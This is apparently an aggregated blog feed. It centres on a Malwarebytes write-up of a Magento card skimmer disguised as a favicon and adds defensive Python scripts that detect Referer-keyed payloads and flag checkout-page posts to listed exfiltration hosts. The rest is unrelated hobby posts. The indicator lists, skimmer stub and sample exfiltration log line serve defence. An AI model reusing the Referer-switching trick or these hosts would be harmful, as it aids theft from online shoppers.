Malwarebytes for Mac detects this remote administration Trojan as OSX-DaclsRAT.

IOCs

899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53
846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6
216a83e54cac48a75b7e071d0262d98739c840fd8cd6d0b48a9c166b69acd57d
d3235a29d254d0b73ff8b5445c962cd3b841f487469d60a02819c0eb347111dd
loneeaglerecords[.]com/wp-content/uploads/2020/01/images.tgz.001

The post New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA app appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Credit card skimmer masquerades as favicon

Malwarebytes - Wed, 05/06/2020 - 15:15

Malware authors are notorious for their deceptive attempts at staying one step ahead of defenders. As their schemes get exposed, they always need to go back to their bag of tricks to pull out a new one.

When it comes to online credit card skimmers, we have already seen a number of evasion techniques, some fairly simple and others more elaborate. The goal remains to deceive online shoppers while staying under the radar from website administrators and security scanners.

In this latest instance, we observed an old server-side trick combined with the clever use of an icon file to hide a web skimmer. Threat actors registered a new website purporting to offer thousands of images and icons for download, but which in reality has a single purpose: to act as a façade for a credit card skimming operation.

The suspicious favicon

This case started with a favicon, the small image displayed in the browser’s tab that websites use for branding and identification.

Figure 1: Some favicons from popular websites

While reviewing our crawler logs, we noticed requests to a domain called myicons[.]net hosting various icons and, in particular, favicons. Several e-commerce sites were loading a Magento favicon from this domain.

Figure 2: A favicon.png for the Magento CMS

This in itself is not particularly suspicious. However, we noticed that the domain myicons[.]net was registered just a few days ago and was hosted on a server (83.166.244[.]76) that was previously identified as malicious. In a blog post, web security company Sucuri disclosed how this host was part of a web skimming campaign using time-based domain names.

In addition, we found that the person who registered myicons[.]net stole all the content from a legitimate site hosted at iconarchive.com, and did it in the simplest way possible: by loading it in an iframe:

<iframe src="http://www.iconarchive.com/" width="100%" height="1015px" frameborder="0" align="left"></iframe>

Figure 3: Decoy site with original site

Our suspicion was that the favicon.png file was malicious and perhaps used steganography to hide JavaScript code. But this was not the case. The image was properly formatted, with no extra code inside.

Figure 4: Suspicious image file turns out to be clean

Conditional server-side response

To better understand what was going on before ruling this out as a false alert, we examined how this file was served in the context of an online purchase. Lo and behold, when visiting the checkout page of a compromised Magento website, the innocent favicon.png turned into something else altogether.

Figure 5: The same web request with a referer including the ‘checkout’ keyword

Instead of serving a PNG image, the malicious server returns JavaScript that builds a credit card payment form. This content is injected dynamically into the DOM to replace the PayPal checkout option with the skimmer’s own drop-down menu for MasterCard, Visa, Discover and American Express. Because the switch is keyed on the Referer header, anyone fetching the URL directly, including security scanners and site administrators, receives a clean image.
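Checking for this trick means requesting the same resource the way a shopper's browser would and the way a scanner would, then comparing what comes back by content rather than by Content-Type. The script below is an added example, not Malwarebytes' tooling: it fetches a URL with a neutral Referer and with one containing "checkout", the keyword the article's Figure 5 shows the server keying on, classifies each body by its magic bytes, and reports a mismatch. The fetch function is injectable so the two constructed stand-in servers at the bottom can exercise it offline; the store URL and the icon URL are placeholders.

```python
import hashlib
import urllib.request

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JS_MARKERS = (b"function", b"document.", b"window.", b"var ", b"const ", b"=>", b"<script")


def http_get(url, referer=None, timeout=10):
    """Plain network fetcher, used when no other fetcher is injected."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    if referer:
        req.add_header("Referer", referer)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.headers.get("Content-Type", ""), resp.read()


def classify_body(body: bytes) -> str:
    """Decide what was actually served from the bytes, never from the headers."""
    if body.startswith(PNG_MAGIC):
        return "png"
    if any(m in body[:4096] for m in JS_MARKERS):
        return "javascript"
    return "other"


def check_conditional_image(url, store="https://shop.example.invalid/", fetch=http_get) -> dict:
    """Fetch `url` twice, once with a neutral Referer and once with a Referer containing
    'checkout', and compare the responses. A differing hash, or an 'image/*' Content-Type
    on a body that is not a PNG, marks the resource as suspicious."""
    seen = {}
    for label, referer in (("neutral", store), ("checkout", store + "checkout/")):
        ctype, body = fetch(url, referer=referer)
        seen[label] = {
            "kind": classify_body(body),
            "content_type": ctype,
            "sha256": hashlib.sha256(body).hexdigest(),
        }
    mismatch = seen["neutral"]["sha256"] != seen["checkout"]["sha256"]
    lied = any(v["content_type"].startswith("image/") and v["kind"] != "png"
               for v in seen.values())
    seen["verdict"] = "suspicious" if (mismatch or lied) else "consistent"
    return seen


# Constructed stand-ins for the servers described in the article (no network involved).
def fake_skimmer_server(url, referer=None):
    """Clean PNG for ordinary requests, JavaScript when the Referer mentions checkout."""
    if referer and "checkout" in referer:
        return "image/png", b"var f=document.createElement('form');/* constructed skimmer stub */"
    return "image/png", PNG_MAGIC + b"\x00" * 40


def fake_clean_server(url, referer=None):
    return "image/png", PNG_MAGIC + b"\x00" * 40


if __name__ == "__main__":
    icon = "https://icons.example.invalid/d/favicon.png"
    print(check_conditional_image(icon, fetch=fake_skimmer_server)["verdict"])  # suspicious
    print(check_conditional_image(icon, fetch=fake_clean_server)["verdict"])    # consistent
```

Against a live site, run it with the real store URL so the Referer matches what the skimmer expects; a CDN that legitimately varies an image by Referer is rare enough that any mismatch deserves a manual look.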

Figure 6: Malicious content hijacks default payment form

“Ant and cockroach” skimmer

This skimmer may be familiar to some under the nickname “ant and cockroach.” It is unusual in that it is customized for both English and Portuguese checkout forms.

In addition to JavaScript code, it contains HTML that will be injected into the checkout page of compromised stores. The idea is to blend in so that shoppers don’t notice anything suspicious.

Figure 7: Rogue HTML form injected into checkout page

While web skimmers primarily focus on credit card data, they typically also collect additional personal information about the victims, including name, address, phone number and email address.

Figure 8: Data fields collected by the skimmer

That data is encoded and then sent back to the criminals. For client-side skimmers, the exfiltration domain could be another hacked site or a malicious site registered strictly for this purpose.

Figure 9: Exfiltration code sending data back to the criminals

Here the exfiltration domain is psas[.]pw, hosted on known criminal infrastructure at the IP address 83.166.242[.]105. Back in March we described a campaign abusing Cloudflare’s Rocket Loader script which we believe is tied to the same threat group.
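The two facts the post relies on, a request from a checkout page to an unexpected third party and a destination that matches a published indicator, can be turned into a proxy-log hunt. This is an added example, not code from the post: the log format and lines are constructed, the allow-list of legitimate checkout hosts and the checkout path markers are assumptions, and the naive `registrable()` helper (last two DNS labels) stands in for a proper public-suffix lookup. The indicator values are the ones listed in the post, undefanged so they match.

```python
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# IoCs as listed in the post (defanged there as psas[.]pw, myicons[.]net, ...).
IOC_HOSTS = {"psas.pw", "myicons.net"}
IOC_IPS = {"83.166.242.105", "83.166.244.76"}

# Assumed allow-list: hosts a checkout page legitimately contacts. Tune per store.
ALLOWED_THIRD_PARTY = {"www.paypal.com", "www.paypalobjects.com"}

# Path fragments that mark a page as part of the purchase flow (assumed).
CHECKOUT_MARKERS = ("checkout", "onepage", "payment")

# Constructed log lines (not real traffic). Simplified format, one request per line:
#   <timestamp> <client_ip> <method> <url> <status> <referer|->
SAMPLE_LOG = """\
2020-05-07T10:01:02Z 10.0.0.5 GET https://shop.example/checkout/onepage/ 200 https://shop.example/cart/
2020-05-07T10:01:03Z 10.0.0.5 GET https://icons.example/d/favicon.png 200 https://shop.example/checkout/onepage/
2020-05-07T10:01:03Z 10.0.0.5 GET https://www.paypalobjects.com/api/checkout.js 200 https://shop.example/checkout/onepage/
2020-05-07T10:01:40Z 10.0.0.5 POST https://psas.pw/ 200 https://shop.example/checkout/onepage/
2020-05-07T10:02:00Z 10.0.0.9 GET https://shop.example/media/favicon.png 200 -
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one log line into fields; return None for malformed lines."""
    parts = line.split(None, 5)
    if len(parts) != 6:
        return None
    keys = ("ts", "client", "method", "url", "status", "referer")
    return dict(zip(keys, parts))


def registrable(host: str) -> str:
    """Crude registrable-domain approximation: last two labels.

    Assumption for the example; real code should use a public-suffix list so
    that shop.co.uk and cdn.co.uk are not treated as the same site.
    """
    return ".".join(host.lower().split(".")[-2:])


def is_checkout_page(url: str) -> bool:
    """Does the URL path look like part of the purchase flow?"""
    path = urlsplit(url).path.lower()
    return any(marker in path for marker in CHECKOUT_MARKERS)


def analyse(rec: Dict[str, str]) -> List[str]:
    """Return the findings for one parsed request (empty list if nothing stands out)."""
    findings: List[str] = []
    dest = (urlsplit(rec["url"]).hostname or "").lower()

    if dest in IOC_HOSTS or dest in IOC_IPS:
        findings.append("ioc-destination")

    referer = rec["referer"]
    if referer != "-" and is_checkout_page(referer):
        ref_host = (urlsplit(referer).hostname or "").lower()
        if registrable(dest) != registrable(ref_host) and dest not in ALLOWED_THIRD_PARTY:
            # Any unexpected third party loaded from the payment page is worth a look...
            findings.append("third-party-from-checkout")
            # ...and a POST there has the shape of the exfiltration the post describes.
            if rec["method"].upper() == "POST":
                findings.append("post-from-checkout")
    return findings


def scan(log_text: str) -> List[Tuple[int, str, List[str]]]:
    """Scan a log; return (line_number, url, findings) for each flagged line."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        rec = parse_line(line)
        if rec is None:
            continue
        findings = analyse(rec)
        if findings:
            hits.append((n, rec["url"], findings))
    return hits


if __name__ == "__main__":
    for n, url, findings in scan(SAMPLE_LOG):
        print(f"line {n}: {url} -> {', '.join(findings)}")
```

On the sample log, line 2 (the favicon fetched from an unknown host while on the checkout page) is flagged by the referer heuristic alone, which matters because a decoy domain registered days ago will not be on any indicator list yet; line 4 is flagged by both the indicator match and the heuristic. The PayPal script on line 3 is skipped only because of the allow-list, so keep that list tight.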

One of many web skimmer campaigns

Judging by the registration date of the decoy icons domain, this particular scheme is about a week old, but it is one of a large number of ongoing skimming attacks.

Malwarebytes users are protected through our real-time web security module in Malwarebytes for Windows and through our Browser Guard extension, available for both Google Chrome and Mozilla Firefox.

Figure 10: Malwarebytes Browser Guard blocking data exfiltration

Indicators of Compromise

Skimmer URL, domain, IP and SHA256

myicons[.]net/d/favicon.png
myicons[.]net
83.166.244[.]76
825886fc00bef43b3b7552338617697c4e0bab666812c333afdce36536be3b8e

Exfiltration domain and IP

psas[.]pw
83.166.242[.]105

The post Credit card skimmer masquerades as favicon appeared first on Malwarebytes Labs.

Categories: Techie Feeds

GFL – Page 0022

Looking For Group - Wed, 05/06/2020 - 13:00

Grouping For Looks is a page-by-page retelling of the Looking For Group saga through the lens of a mirror universe where Cale is a goateed tyrant and Richard is a holy soul trying to set him on a good path. […]

The post GFL – Page 0022 appeared first on Looking For Group.

Categories: Web Comics

Hoard of Delusion

Ten Foot Pole - Wed, 05/06/2020 - 11:43
By Mark Ahmed, Sean Ahmed, Scot Hoover
Axe mental Productions
OSRIC
Levels 1-4

Hidden below the Black Fen lies the fabled Hoard of Delusion.

This 117 page adventure presents a village, wilderness region, and fifty room four level dungeon. It’s easy to see what it wants to do, but is bogged down with not knowing how to get there. Good ideas marred by poor execution; this needs a full rework to be usable.

This is striving to be like the adventures of Ye Olde Days, the better ones anyway, with a village, a wilderness region, and a multi level dungeon. It’s built around the dungeon, with village and wilderness encounters supporting/providing hints to the dungeon. The village and wilderness have interconnections within them, and a couple of sub-plotty/other-shit-going-on things going on. There’s even a keep in the village. The idea of a village, wilderness area and dungeon environment supporting each other is great; it’s what adventures of this type SHOULD be doing.

Further, the dungeon environment has some good ideas. New monsters, and classic elements abound. Giant octopus, mimic-like things, a giant eyeball on a ceiling, cracks in the earth that mist flows from, a rope bridge, and brains in jars. 

It’s marred, though, by being nigh unusable because of the description style used. And some pretty hairy encounters.

Level 1-4? Great! The area in the ruins, outside of the dungeon has a 5 HD hydra. The first room of the dungeon has a 7HD baddie with a gaze attack. 10HD black pudding? Toss it in there! A 12HD monster? No problem! I get it, OSR, you can run away. But the first room? And the dungeon entrance/ruins outside? This seems more like an issue of scaling. 

Further, the treasure is low throughout. It notes that the wilderness areas can be used to gain levels/experience before tackling the dungeon. (You know, the one with a 5 HD hydra outside and a 7HD monster in the first room? The one with the gaze attack?) But the loot is low, WAY too low, for anyone to be doing much leveling. Not quite comically low, but it’s hard for me to see a party leveling to three, and two might be difficult if you don’t recover everything available.

The village is described incorrectly; of course, most villages are. The mundanity and backstory of the people, with little assistance on the subplots or a reference on where the party might like to go. Villages are not explored like dungeons. You don’t walk down the street looking into every shop. You get directions to the General Store and go there. And yet, this is laid out like a typical dungeon. 

And then there’s small map issues and other mistakes. No stairs on the map in the first room of the dungeon. Encounters left off of the wilderness maps. Just sloppy stuff.

But, the real issue is the encounter descriptions. As always.

The descriptions can be long. VERY long in cases. Page long rooms. No one can run a fucking page long room well unless the formatting and layout are par excellence. And they ain’t here. It doesn’t matter: village, wilderness, dungeon, the encounters are all done in the same manner and SO. FUCKING. FRUSTRATING. Ignoring, for a moment, the usual tavern descriptions and how everyone on earth feels the need to redescribe it, the rooms are a fucking mess. This room used to be. However, Frank looted all of the bodies. A paragraph of backstory. Important details mixed in to the backstory descriptions. Conversational, with no knowledge of how to organize a description. The inn has three or four tables and a booth. Great. A wonderful night of D&D was then had. This fucking shit is garbage. This is a bit hyperbolic, but: Does every fucking word of your description contribute to the ACTIVE adventuring environment? No? Then fucking cut it. And then, when writing a description, put the important and obvious shit up at the front of the description.

When the players open the door to a room I’m not taking ten fucking minutes to read the fucking room description to myself before conveying it to them. The fucking phones come out, and rightfully fucking so. I’d be a shitty shitty DM if I did that. But what other choices do you have? Ye Olde Highlighter, going through the adventure highlighting and making margin notes? Seriously? If you have to fucking do that then the adventure was not written well. It’s failing at its core purpose: being useful to the DM as a play aid at the table. Why the fuck is this so hard to grasp? People bitch a blue streak that they don’t use adventures because they are a pain and require prep, note taking and highlighting. They are fucking right. 

What’s all the sadder is that you can tell what this wanted to BE. The village, the wilderness, the dungeon. The interconnectedness. The classic dungeon elements. Iconic rooms that don’t feel like set pieces. But in the end none of that matters, because it’s 117 pages of unusable adventure.

This is $12 at DriveThru. The preview is 80 pages. That’s what I like to see! Take a gander at room one on page 58 of the preview/54 of the book. Good idea. Some useful imagery. One of the better rooms, and the adventure MIGHT be salvageable if all of the other rooms were as good as this. Maybe.


Categories: Tabletop Gaming Blogs

Wednesday Comics: Fourth World Reread Week 2

Sorcerer's Skull - Wed, 05/06/2020 - 11:00
One thing that virtually all of the continuations of the Fourth World saga by other hands seem to miss is that it isn't just a superhero action epic, but like all good mythologies, there are things going on beneath the surface.

New Gods #6 (on sale in October of 1971) continues Orion's struggle against the Deep Six, a group of Apokoliptian fishmen with the ability to mutate other lifeforms. They are not the best villains of the saga by any means, but Kirby uses them in issue 5 to reveal things about Orion, and in this issue, "Glory Boat!", to tell an allegorical story about war and its human cost.

The setup is almost Biblical. A great sea creature recalling Leviathan and all the primeval, Chaos monsters of the depths, a family, emblematic of humanity as a whole: the bellicose and overbearing father, the "conscientious objector" son, and the daughter who doesn't get to do much between the two's bickering. God of war Orion also has someone to play off here, his friend, Lightray, embodying the enlightenment of New Genesis.

Where Orion's instinct is to destroy his foes, Lightray strives to show a better way, to rehabilitate. He succeeds in transforming one of the Deep Six's creatures into the service of our heroes. Unfortunately for the humans, the Deep Six are drawn back to the boat.

The father freezes, having some sort of breakdown when confronted with the creatures. The son, the peacenik, goes on the offensive, attacking the Apokoliptian Jafar. Jafar kills him, mutating his face into that of a featureless, metallic mannequin. Lightray opines that the war has taken "another faceless hero."

Lashed to the mast, the father bears witness to what is to come. Orion and Lightray take the son's body and launch themselves into a possibly final attack against the remaining Deep Three, in an epic two page spread.

But Lightray and Orion are not destined for some Neo-Valhalla, just yet. The boy goes "to the Source" and the New Gods live to fight another day. The father, still on the mast amid the wreckage of the ship, is left to wonder as Kirby tells us: "What is a man in the last analysis--his philosophy or himself?"

It's heavy-handed perhaps, but no more so than the work of the writers who would come to be seen as seminal figures of the 70s, leading the "maturation" of comics.

BIG FINISH: Timeslip – Livestream premiere TONIGHT!

Blogtor Who - Wed, 05/06/2020 - 10:50

At 22:00 (UK time) the first episode of the brand new Timeslip series will premiere as a livestream on YouTube, giving Big Finish fans an exclusive chance to listen for free. Timeslip was originally an ITV series broadcast in 1970, which followed two children, Simon and Liz, on their adventures through a ‘time barrier’ as […]

The post BIG FINISH: Timeslip – Livestream premiere TONIGHT! appeared first on Blogtor Who.

Categories: Doctor Who Feeds

Myth Beyond The Monster Manual - The Erinyes Devils of Violence & Justice For Your Old School Sword & Sorcery Campaigns

Swords & Stitchery - Wed, 05/06/2020 - 05:21
I've been quietly cracking open my first edition Advanced Dungeons & Dragons Monster Manual & looking into the devils section last night. I looked into the Erinyes entry for a bit of Sword & Sorcery inspiration. The Monster Manual & even the original Dungeons & Dragons monster stats profile has been lacking. Greco Roman mythology is so much richer on these goddesses & children of Chronos's […]
Categories: Tabletop Gaming Blogs

Campaign Hook and Some Character Building

The Splintered Realm - Wed, 05/06/2020 - 01:37
Mikah the Chronicle opened a filing cabinet. It was amazing he knew which one. There were hundreds - no, thousands - of filing cabinets here. They sat in rows and rows, each filled (presumably) with file folders. Mikah the Chronicle produced one. He handed it to you. You read the label: “Last Known Location of Doc Stalwart.”
Campaign Hook: The Search for Doc Stalwart
At the end of the Stalwart Age, Doc Stalwart was the greatest hero in the world. He had overcome incredible challenges, defeating many of the most powerful villains in the world. And then, at the height of his fame and success, he disappeared.
That was twenty years ago. Eventually, people accepted that he was gone. Probably dead. Maybe at the bottom of the sea. Or at the edges of the solar system. Or in a far-off dimension beyond mortal reach. But now, he’s alive. Several mentalists have felt his presence in the world. 
The campaign is a loosely-connected series of location adventures wherein the heroes undertake a quest to find Doc Stalwart. As they go, they may amass clues that will allow them to find him and restore him to life. Or, maybe they won’t.
My idea right now is that I am going to write the adventure locations one at a time, and plant a seed in each one about the quest for Doc. I am going to make a character to maybe play test with...
Judah Jynx. The son of the ghost Zirah - Judah has supernatural powers.  I'm thinking a ghost as the character theme.
Let’s see what I get from random rolling:
Altered human. +1 to one attribute, +1 Feat rating.
4 Traits: Stun, Invisibility, Swingline, Phasing
He’s like the invisible girl, but with a stun instead of the telekinesis. Hm. I need some way to do damage (right?) I don’t really like invisibility or swingline, but I’d rather have teleport. Actually, I am going to swap invisibility and swingline for blink. So, I have stun, blink, and phasing. I’m sort of a proto-vision kind of character. Definitely works with my ghost theme.
I’m going to take a drawback and pick up one other trait… not sure what. I need a way to deal damage, so I’m thinking a weapon of some kind (a sword like his mom?) He doesn’t need the sword - he is bound to the realm, unlike his mom - but he THINKS he does. He has panic attacks when the sword is not on him. 
He will take melee weapon, sword, with his bonus trait. So, he has:
Stun, Phasing, Blink, Melee Weapon
Rolling for attributes:
12, 14, 15, 12, 13, 12
Wow did I roll really well! I’d like to bump up that 15 to a 16, and while it doesn’t make sense to drop 12s, I don’t need secondary attributes that high. I’m actually going to drop the two 12s all the way to 10, giving me 2 points; I bump the 15 to 16, and the 13 to 14. Noice. I arrange as follows:
STR 12 (+3); INT 10 (+2); PWR 16 (+5)
DEX 14 (+4); CON 14 (+4); CHA 10 (+2)
For hit points, I roll 12 (I rerolled a 2 and got 6). That gives me 16 starting hit points.
My Feat modifier is +8.
My talent will be enemy (?) I don’t see this character having an enemy, but I guess he would… sure… hmm. Have to think on that more.
Armor class is going to be 15. 
I have to do some math on my traits:
My sword deals base 1d8 damage. Happy with that. It cannot be thrown (and if it could be, he wouldn’t; he’s got that anxiety about being separated from it, so intentionally winging it at someone else in combat doesn’t make much sense).
When I phase, I’m going to take +5 to AC (bumping it to 20), get +5 to hit and damage with my sword (instead of the +3 I get normally), and I can attempt a PWR check to move through solid objects. Dang that’s nice… I extend this to my blade (of course) which partially phases with me (or which channels some of my natural energy; something like that).
I have a stunning glare (to 90’) that forces a target once per turn to attempt a Feat (DT 25) or be stunned for 1d6 rounds. Nice.
He’s going to be a hero, and his purpose is going to be to honor his mother (who is trapped in the Shadow Realm, and is only accessed via a special mirror). He was born in the shadow realm, but then was brought over. I was going to go with his name (Judah Jynx) for his moniker, but I looked up ghost in the thesaurus and found Ether. I modified that for a moniker. And, reviewing my notes, I see that I forgot a +1 to one attribute. Oops. I throw that into DEX.
Etherian
Judah Jynx; Hero 1
AC 15 (20 phased); hp 16; Feat +8; Sword (+4/1d8+4 -or- +6/1d8+6 while phased)
STR 12 (+3); INT 10 (+2); PWR 16 (+5)
DEX 15 (+4); CON 14 (+4); CHA 10 (+2)
Enemy: The Shadow King Asigoth (and his servants)
Blink (as a free action, up to 160’, 5x per turn)
Phasing (one action once per turn; PWR check)
Stun (one action; force target within 90’ to attempt Feat CR 25 or stunned 1d6 rounds)
I wanted a character a little bit like Nightcrawler; I think I have him. He’s definitely different, but he makes sense. 
About the Shadow Realm (also called the Vale of Shadows): This is a mystical dimension of dark energy. It is controlled by the Shadow King Asigoth, who seeks to cross over into our realm and touch all corners with shadow. His efforts were stopped by Zirah, who intentionally made herself a barrier between lands, preventing him from crossing over. 

Hookin On Hump Day #214: A Yarny Link Party!

Moogly - Wed, 05/06/2020 - 01:00

Hookin On Hump Day is here with another wonderful collection of knit and crochet patterns for you! Get all the links, and check out the new entries below – there’s so much wonderful stuff out there! What is Hookin On Hump Day? Hookin On Hump Day is a knit and crochet link party hosted here...

Read More

The post Hookin On Hump Day #214: A Yarny Link Party! appeared first on moogly. Please visit www.mooglyblog.com for this post. If you are viewing this on another site they have scraped the content from my website without permission. Thank you for your support.

Categories: Crochet Life


Subscribe to Furiously Eclectic People aggregator